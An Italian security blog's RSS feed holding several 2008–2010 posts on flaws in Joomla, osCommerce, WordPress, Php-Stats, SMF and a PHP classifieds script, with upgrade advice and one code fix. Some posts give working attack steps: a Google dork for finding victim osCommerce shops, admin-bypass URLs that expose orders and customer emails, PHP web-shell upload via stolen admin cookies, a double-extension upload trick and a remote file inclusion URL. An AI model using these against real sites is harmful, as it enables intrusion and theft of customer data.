		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</guid>
		<description><![CDATA[Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto Cms Joomla. E&#8217; stata pubblicata da poco una vulnerabilità di tipo XSS per tutte le versioni &#60; =1.5.20, ossia tutte le versioni attualmente pubblicate. Tale exploit sfrutta una falla nella verifica delle variabili GET [...]]]></description>
			<content:encoded><![CDATA[<p><br class="spacer_" /></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1.png" rel="lightbox[386]" title="Joomla"><img class="alignleft size-thumbnail wp-image-387" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1-150x150.png" alt="[EXPLOIT]   Joomla all versions XSS vulnerability" width="150" height="150" /></a>Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto <strong><a href="http://www.joomla.org" target="_blank">Cms Joomla</a></strong>.</p>
<p>E&#8217; stata pubblicata da poco una vulnerabilità di tipo <strong>XSS</strong> per tutte le versioni <strong>&lt; =1.5.20</strong>, ossia <strong>tutte le versioni attualmente pubblicate</strong>.</p>
<p>Tale exploit sfrutta una falla nella verifica delle variabili GET encodate eseguendo quindi il codice Javascript che si passa all&#8217;applicativo.</p>
<p><a href="http://seclists.org/fulldisclosure/2010/Oct/109" target="_blank">Full Discolsure Advisories</a></p>
<p>Al seguente video si potrà vedere un Proof of Concept dell&#8217;attacco Xss.</p>
<p><a href="http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/">Proof of Concept by yehg.net</a></p>
<p><span id="more-386"></span></p>
<p>Un malintenzionato potrebbe sfruttare tale falla per rubare i cookie degli utenti loggati, Administrator compreso, e sfruttarli per modificare pagine o uploadare shell malevole che permetterebbero qualsiasi operazione nello spazio del sito vittima. Una volta rubati i cookie di Admin, infatti, basterà andare nella pagina di edit di uno dei template di default, di solito &#8216;beez&#8217;, e successivamente editare la pagina con il codice di una shell php quali <strong>c99</strong> o <strong>r57</strong>.</p>
<p>Provvedero&#8217; ad aggiornare il post quanto prima con tutti i riferimenti e i dettagli (sono in treno con l&#8217;app WordPress per Blackberry <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT]   Joomla all versions XSS vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla all versions XSS vulnerability pics" />  ).</p>
<p><strong>AGGIORNAMENTO #1</strong><br />
 Lo staff di Joomla ha provveduto a rilasciare la nuova versione dove tale problema e&#8217; stato fixato.</p>
<p>Chiunque utilizzi questo Cms e&#8217; invitato ad <strong>effettuare l&#8217;upgrade alla versione 1.5.21</strong></p>
<p><a href="http://www.joomla.org/announcements/release-news/5300-joomla-1521-released.html" target="_blank">Joomla 1.5.21 &#8211; Official Site</a></p>
<p><a href="http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html" target="_blank">Joomla Security News</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla 1.5.12 RCE via TinyMCE upload vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html#comments</comments>
		<pubDate>Tue, 24 Nov 2009 23:35:03 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hash md5]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5.12]]></category>
		<category><![CDATA[tinymce exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=354</guid>
		<description><![CDATA[Per chi non avesse ancora aggiornato Joomla all&#8217;ultima versione 1.5.15 segnalo l&#8217;ennesima vulnerabilità trovata nelle versioni precedenti. Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell&#8217;utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall&#8217;italiano Luca &#8220;daath&#8221; De Fulgentis che ha illustrato nel [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/joomla_tra.jpg" rel="lightbox[354]" title="Joomla"><img class="alignleft size-thumbnail wp-image-355" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2009/11/joomla_tra-150x150.jpg" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a>Per chi non avesse ancora aggiornato <a href="http://www.joomla.org" target="_blank"><strong>Joomla</strong></a> all&#8217;ultima versione 1.5.15 segnalo l&#8217;ennesima <strong>vulnerabilità</strong> trovata nelle versioni precedenti.</p>
<p>Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell&#8217;utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall&#8217;italiano Luca &#8220;daath&#8221; De Fulgentis che ha illustrato nel dettaglio l<strong>&#8216;exploit</strong> nel suo <a href="http://blog.nibblesec.org/2009/09/just-press-exploit.html" target="_blank">blog</a>.</p>
<p>Dal sito di <a href="http://www.exploit-db.com/exploits/10183" target="_blank">Offensive-Security</a>, che andrà a sostituire il noto <a href="http://www.milw0rm.com/" target="_blank">Milw0rm</a>, ormai chiuso, è possibile <strong>scaricare l&#8217;exploit Php</strong> che consente di uploadare qualsiasi tipo di file semplicemente eseguend l&#8217;exploit php dalla propria shell.</p>
<p><span id="more-354"></span></p>
<p>Come detto in precedenza l&#8217;hack sfrutta una vulnerabilità del<strong> TinyMCE</strong>. Questo editor utilizza un array dove vengono dichiarate le estensioni dei file che non possono essere uploadate ma modificando opportunamente gli <strong>Header HTTP</strong> è possibile uploadare un file con un&#8217;estensione accettata e successivamente far effettuare il rename del file allo stesso TinyMCE.</p>
<p>Ovviamente vi è un sistema di &#8220;sicurezza&#8221; nello script dell&#8217;editor ma, purtroppo, si tratta di una semplice verifica di un <strong>hash MD5</strong> generato dalla concatenazione della path assoluta con una variabile chiamata &#8220;$tinybrowser['obfuscate']&#8221; che è settata di default a &#8220;s0merand0mjunk!!!111&#8243; nel file &#8220;config_tinybrowser.php&#8221; che trovate al seguente percorso:</p>
<p><cite>http://&lt;path_joomla&gt;/</cite>plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/config_tinybrowser.php</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/tinybrowser.PNG" rel="lightbox[354]" title="TinyBrowser"><img class="aligncenter size-thumbnail wp-image-356" title="TinyBrowser" src="http://www.capn3m0.org/wp-content/uploads/2009/11/tinybrowser-150x150.PNG" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a></p>
<p>Questo invece il sistema di &#8220;sicurezza&#8221; (o meglio, la <strong>vulnerabilità</strong>) del file &#8220;upload_file.php&#8221; che verifica l&#8217;Hash MD5:</p>
<p><br class="spacer_" /></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/uploadtinybrowser.PNG" rel="lightbox[354]" title="Upload File TinyBrowser"><img class="aligncenter size-thumbnail wp-image-357" title="Upload File TinyBrowser" src="http://www.capn3m0.org/wp-content/uploads/2009/11/uploadtinybrowser-150x150.PNG" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a></p>
<p>L&#8217;<strong>exploit</strong> creato da daath una volta indicato il &#8220;sito vittima&#8221; per prima cosa provvede a bypassare questo meccanismo effettuando un Path Disclosure. Con questa tecnica si interroga un file in modo non corretto così da far mostrare a video un tipico errore PHP che riporta la path assoluta del file in errore. Una volta ottenuta questa informazione si potrà ricreare l&#8217;Hash MD5 (path assoluta + &#8216;s0merand0mjunk!!!111&#8242;) tramite il quale poter lanciare una <strong>POST Http</strong> per l&#8217;upload del file. Il file, ovviamente, dovrà avere un&#8217;estensione valida come, ad esempio, &#8220;.jpg&#8221;.</p>
<p>Una volta effettuato l&#8217;upload si effettua una seconda interrogazione Http inviando i dati necessari a far eseguire il rename del file da &#8220;.jpg&#8221; (o qualunque estensione è stata scelta) a &#8220;.php&#8221;.</p>
<p>A questo punto si avrà una <strong>shell</strong> sul sito e si potra effettuare qualsiasi azione sia consentita all&#8217;utente web del sito vittima.</p>
<p>Come detto all&#8217;inzio dell&#8217;articolo provvedete sempre ad aggiornare alle ultime release le vostre applicazioni web! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability pics" /> </p>
<p><br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT - POC] &#8211; osCommerce 2.2 RC2 Authentication Bypass</title>
		<link>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html</link>
		<comments>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html#comments</comments>
		<pubDate>Wed, 18 Nov 2009 20:28:26 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[osCommerce 2.2 RC2]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=342</guid>
		<description><![CDATA[Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova vulnerabilità per il noto ma allo stesso tempo abbandonato osCommerce RC 2.2 che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password. Come potrete verificare personalmente tramite questo Proof Of Concept basterà richiamare l&#8217;url dell&#8217;Area Admin con una [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce.gif" rel="lightbox[342]" title="osCommerce"><img class="alignleft size-thumbnail wp-image-343" title="osCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce-150x60.gif" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="60" /></a>Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova <strong>vulnerabilità</strong> per il noto ma allo stesso tempo abbandonato <strong>osCommerce RC 2.2</strong> che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password.</p>
<p>Come potrete verificare personalmente tramite questo <strong>Proof Of Concept</strong> basterà richiamare l&#8217;url dell&#8217;Area Admin con una particolare sintassi e il gioco è fatto e <strong>si potranno visionare gli ordini, i clienti, le email</strong>.</p>
<p>Già verso agosto fu scoperta una grave falla nel meccanismo di autenticazione che consentiva, tramite opportune interrogazioni HTTP (http request) di <strong>eseguire comandi lato server</strong> e, sfruttando alcuni file dell&#8217;osCommerce stesso,  di uploadare file, shell etc.</p>
<p>Per maggiori informazioni circa questa vulnerabilità andate a questo <a href="http://secunia.com/advisories/33446/" target="_blank"><strong>link</strong></a>.</p>
<p>Per quanto riguarda la falla di cui vi parlo oggi vi illustro di seguito come sfruttarla e quali informazioni si possono ottenere. Per prima cosa è necessario trovare un &#8220;<strong>sito vittima</strong>&#8220;  e per fare questo ci viene incontro, ancora una volta, <a href="http://www.google.com/" target="_blank"><strong>Google</strong></a>!</p>
<p><span id="more-342"></span>Cercate su Google la seguente stringa:</p>
<p><cite>&#8220;Powered by OsCommerce&#8221;</cite></p>
<p>(compresa di virgolette)</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search.PNG" rel="lightbox[342]" title="Dork OsCommerce"><img class="size-thumbnail wp-image-344 aligncenter" title="Dork OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search-150x68.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="68" /></a></p>
<p>In questo modo il Motore di Ricerca ci mostrerà solo i siti che contengono esattamente quella frase e, quindi, con molta probabilità siti basati su <strong>OsCommerce</strong>.</p>
<p>A questo punto aprite qualche sito e verificate se richiamando l&#8217;area &#8220;admin&#8221; vi viene mostrata correttamente la pagina di login.</p>
<p>L&#8217;area admin di default è raggiungibile al seguente url:</p>
<p><cite>http://&lt;dominio_con_oscommerce&gt;/admin</cite></p>
<p>Se l&#8217;Admin non ha cambiato il nome della cartella vi apparirà una schermata simile a questa.</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce.PNG" rel="lightbox[342]" title="Admin Login OsCommerce"><img class="size-thumbnail wp-image-345 aligncenter" title="Admin Login OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce-150x150.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="150" /></a></p>
<p>A questo punto si sfrutterà la vulnerabilità nell&#8217;autenticazione per <strong>bypassarla</strong> semplicemente digitando i seguenti url:</p>
<p>/admin/orders.php/login.php<br />
 /admin/mail.php/login.php<br />
 /admin/mail.php/login.php?fooled<br />
 /admin/mail.php/login.php?action=send_email_to_user</p>
<p>Cosa succede richiamando questi url? (a voi scoprirlo!)</p>
<p>Si accederà in visualizzazione alle funzionalità di quei file e quindi, nell&#8217;esempio citato sopra, <strong>si potranno leggere gli ordini e vedere i clienti con le relative email</strong>.</p>
<p>Questo articolo è solamente un Proof Of Concept e pertanto non deve portare ad alcuna azione malevola.</p>
<p>Per chi utilizza <strong>OsCommerce</strong> consiglio o di valutare il passaggio a tutt&#8217;altro applicativo, visto anche che il progetto è ormai fermo, oppure di andare sul Forum di OsCommerce dove suggeriscono una semplice ma efficace (?) fix al problema.</p>
<p>Link correlati:</p>
<p><strong><a href="http://seclists.org/fulldisclosure/2009/Nov/169" target="_blank">OS Commerce authentication bypass by Stuart Udall</a></strong></p>
<p><a href="http://forums.oscommerce.com/topic/348589-serious-hole-found-in-oscommerce" target="_blank"><strong>Post dal Forum di OsCommerce</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; WordPress </title>
		<link>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html</link>
		<comments>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html#comments</comments>
		<pubDate>Sat, 14 Nov 2009 16:24:46 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=337</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock.png" rel="lightbox[337]" title="WordPress File Arbitrary Upload"><img class="alignleft size-thumbnail wp-image-338" title="WordPress File Arbitrary Upload" src="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock-150x150.png" alt="[EXPLOIT]   Wordpress <= 2.8.5 Arbitrary File Upload" width="150" height="150" /></a>Ieri avevo dato <a href="http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html" target="_self">notizia</a> del rilascio della versione<strong> 2.8.6 di WordPress</strong> che risolveva due falle di <strong>sicurezza</strong>.</p>
<p>La notizia non era molto dettagliata poiché la <strong>vulnerabilità</strong> era stata annunciata molto genericamente come una vulnerabilità che permetteva di &#8220;<strong>aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache&#8221;.</strong> Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e <strong>Proof of Concept</strong>.</p>
<p>In realtà la vulnerabilità <strong>permette di uploadare file bypassando il controllo</strong> della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. <strong>Affligge tutte le versioni inferiori alla 2.8.5</strong> (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.</p>
<p><span id="more-337"></span>
<p>La notizia era stata pubblicata l&#8217;11 Novembre scorso nella nota Mailing List <a href="http://seclists.org/fulldisclosure" target="_blank"><strong>Full Disclosure</strong></a> dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo <a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">link</a>. Praticamente spiega che la verifica del file uploadato avviene confrontando l&#8217;estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.</p>
<p>La Regular Expression, però, unita al fatto che i WebServer <a href="http://apache.org/" target="_blank"><strong>Apache</strong></a> (solamente in una particolare configurazione spiegata <a href="http://seclists.org/fulldisclosure/2009/Nov/152" target="_blank"><strong>qui</strong></a>) consentono di creare file nel formato</p>
<p>
<blockquote>filename.ext1.ext2</p></blockquote>
<p>può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:</p>
<blockquote><p>phpinfo.php.jpg</p>
</blockquote>
<p>In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l&#8217;estensione &#8220;.jpg&#8221; e successivamente, verificandola con l&#8217;Array dei Mime Types ammessi, <strong>permetterebbe al file di essere uploadato scambiandolo per un&#8217;immagine</strong>.</p>
<p>Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:</p>
<blockquote><p>http:///wp-content/uploads/2009//phpinfo.php.jpg</p>
</blockquote>
<p>Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto <strong>che chi attaca deve essere un membro dello staff con privilegi di pubblicazione</strong> come era stato annunciato in occasione della 2.8.6.</p>
<p>Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.</p>
<p>Eccovi alcuni link correlati:</p>
<p><a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">Proof Of Concepts &#8211; WordPress &lt;= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski</a></p>
<p><a href="http://www.vupen.com/english/advisories/2009/3234" target="_blank">Vupen &#8211; WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities</a></p>
<p><a href="http://www.securityfocus.com/bid/37014/info" target="_blank">SecurityFocus &#8211; <span>WordPress Unspecified Cross Site Scripting Vulnerability</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT/FIX] Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit</title>
		<link>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html</link>
		<comments>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html#comments</comments>
		<pubDate>Sat, 11 Oct 2008 23:20:51 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[code execution]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Milworm]]></category>
		<category><![CDATA[php stats]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=98</guid>
		<description><![CDATA[In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche Php-Stats 0.1.9.2 (utilizzato anche in questo Blog). Le vulnerabilità sono di due tipi: Blind SQL Injection e [...]]]></description>
			<content:encoded><![CDATA[<p>In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche <a href="http://php-stats.com/" target="_blank"><strong>Php-Stats 0.1.9.2</strong></a> (utilizzato anche in questo Blog).</p>
<p><span id="more-98"></span></p>
<p>Le vulnerabilità sono di due tipi: <a href="http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_Injection" target="_blank"><strong>Blind SQL Injection</strong></a> e <a href="http://en.wikipedia.org/wiki/Arbitrary_code_execution" target="_blank"><strong>Remote Code Execution</strong></a>.</p>
<p>Tale vulnerabilità è stata riportata da <a href="http://www.milw0rm.com" target="_blank"><strong>Milworm</strong></a> e <a href="http://www.milw0rm.com/exploits/4513" target="_blank"><strong>questo</strong></a> è l&#8217;indirizzo dell&#8217;Exploit.</p>
<p><a href="mailto:n0b0d13s@gmail.com "><strong>Egix</strong></a>, lo scopritore di tale vulnerabilità riporta anche un fix da applicare al file &#8220;<strong>php-stats.recjs.php</strong>&#8221; al fine di correggere tale falla di sicurezza.</p>
<p>Per fixare il vostro <strong>Php-Stats</strong> aprite il file &#8220;<strong>php-stats.recjs.php</strong>&#8221; e posizionatevi alla <strong>Riga 94</strong>. Troverete il seguente codice:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=urldecode($_GET['ip']); else break;</strong></p>
</blockquote>
<p>che andrà sostituito con questo:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=intval(urldecode($_GET['ip'])); else break;</strong></p>
</blockquote>
<p>Come sempre eccovi il file già fixato:</p>
<p><strong><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/php-statsrecjs.rar">Fix Php-Stats 0.1.9.2</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html</link>
		<comments>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html#comments</comments>
		<pubDate>Sun, 05 Oct 2008 00:05:59 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[simple machine forum]]></category>
		<category><![CDATA[smf]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[WHK]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=96</guid>
		<description><![CDATA[E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc. Questo l&#8217;Exploit pubblicato su Milw0rm: Name: SMF 1.1.6 Filter [...]]]></description>
			<content:encoded><![CDATA[<p>E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione <strong>1.1.6</strong> di <strong><a href="http://www.simplemachines.org/" target="_blank">Simple Machine Forum</a> (o SMF)</strong> che permette di <strong>bypassare</strong> il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.</p>
<p><span id="more-96"></span></p>
<p><a href="http://www.milw0rm.com/exploits/6665" target="_blank">Questo</a> l&#8217;Exploit pubblicato su <a href="http://www.milw0rm.com/" target="_blank"><strong>Milw0rm</strong></a>:</p>
<blockquote><p>Name: SMF 1.1.6 Filter Post Bypass<br />
 Author: WHK<br />
 WebSite: http://www.jccharry.com/</p>
<p>en{<br />
 The data in a post are not filtered properly when someone enters<br />
 statements BBCode wrong without content that a user can enter<br />
 words banned by the system of restrictions by allowing expose<br />
 SPAM content, and so on.<br />
 }</p>
<p>es{<br />
 Los datos en un post no son filtrados adecuadamente cuando alguien<br />
 ingresa declaraciones bbcode sin contenido probocando que un<br />
 usuario pueda ingresar palabras prohibidas por el sistema de<br />
 restricciones permitiendo exponer contenido SPAM, etc.<br />
 }</p>
<p>Example of a post / Ejemplo de un post:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
 [color=red][size=20pt]Fu[url][/url]ck you admin![/size][/color]</p>
<p>My SPAM: [b]ht[b][/b]tp://www.jc[i][/i]charry.com/[/b] &gt;:D<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Demo:</p>
<p>http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png</p>
<p># milw0rm.com [2008-10-04]</p>
</blockquote>
<p>Viene spiegato che &#8220;<em>&#8230;i dati in un post non vengono filtrati correttamente quando vengono inseriti alcuni tag BBCode errati permettendo così di inserire parole (o tutto ciò che è ritenuto SPAM) bypassando il Filtro AntiSpam..</em>&#8220;.</p>
<p>L&#8217;autore dell&#8217;exploit, tale <a href="http://www.jccharry.com/ " target="_blank"><strong>WHK</strong></a>, allega poi l&#8217;immagine seguente dove riporta sia il metodo con cui ha inserito il testo ed i BBcode nel Post, sia il risultato finale.</p>
<div id="attachment_97" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass.png" rel="lightbox[96]" title="smf_filter_post_bypass"><img class="size-medium wp-image-97" title="smf_filter_post_bypass" src="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass-300x248.png" alt="[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass   Milw0rm" width="300" height="248" /></a><p class="wp-caption-text">Esempio pubblicato dall&#39;autore</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 &#8211; RFI</title>
		<link>http://www.capn3m0.org/exploit-snetworks-php-classifieds-50-rfi.html</link>
		<comments>http://www.capn3m0.org/exploit-snetworks-php-classifieds-50-rfi.html#comments</comments>
		<pubDate>Sat, 04 Oct 2008 13:27:26 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[PHP CLASSIFIEDS]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[Rfi]]></category>
		<category><![CDATA[SNETWORKS]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=95</guid>
		<description><![CDATA[Oggi facendo il mio lavoro sono incappato in un sito con installato lo script &#8220;SNETWORKS PHP CLASSIFIEDS&#8221; constatando che è vulnerabile a diversi tipi di hacking. Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate [...]]]></description>
			<content:encoded><![CDATA[<p>Oggi facendo il mio lavoro sono incappato in un sito con installato lo script &#8220;<strong><a href="http://www.craigslistclone.info/" target="_blank">SNETWORKS PHP CLASSIFIEDS</a></strong>&#8221; constatando che è vulnerabile a diversi tipi di hacking.</p>
<p>Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la <a href="http://it.wikipedia.org/wiki/Remote_File_Inclusion" target="_blank"><strong>Remote File Inclusion</strong></a> utilizzata che, comunque, si trova facilmente cercando in Rete:</p>
<blockquote><p><strong>http://[Taget]/[Path]/config.inc.php?path_escape=&lt;url che volete includere&gt;?</strong></p>
</blockquote>
<p><span id="more-95"></span></p>
